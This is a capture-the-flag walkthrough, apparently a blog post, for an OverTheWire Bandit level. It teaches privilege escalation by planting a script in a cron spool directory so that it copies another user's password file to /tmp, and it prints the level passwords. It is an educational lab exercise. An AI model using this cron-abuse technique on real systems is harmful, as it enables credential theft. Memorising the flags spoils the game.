Introduction
Welcome back, in this level we will learn some basics of privilege escalation by abusing cron jobs.
Previous flag
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G Checking Cron files
Let´s start checking cron jobs for the user bandit24.
cat /etc/cron.d/cronjob_bandit24 The entries within this file reveal the location of a script in the /usr/bin folder.
Reading Cron Script
Let’s open the .sh script file and check its contents:
cat /usr/bin/cronjob_bandit24.sh The contents of this file show us that the cron job iterates over the files in the /var/spool/bandit24/foo folder and executes files owned by us, bandit23
#!/bin/bash myname=$(whoami) cd /var/spool/$myname/foo echo "Executing and deleting all scripts in /var/spool/$myname/foo:" for i in * .*; do if [ "$i" != "." -a "$i" != ".." ]; then echo "Handling $i" owner="$(stat --format "%U" ./$i)" if [ "${owner}" = "bandit23" ]; then timeout -s 9 60 ./$i fi rm -f ./$i fi done Let’s write a bash command that copies the password from bandit24 to a temporary location
cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt Abusing the Cron Job
Create a directory and script to intercept the password:
mkdir /tmp/bandit23 nano /var/spool/bandit24/foo/script.sh Within the newly created script, inscribe the command we defined before:
#!/bin/bash cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt Grant execution permissions to the script:
chmod +x /var/spool/bandit24/foo/script.sh Now, the exploit is set. After the cron job is executed, we can read the password for the next level:
cat /tmp/bandit23/password.txt Flag:
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 
Top comments (0)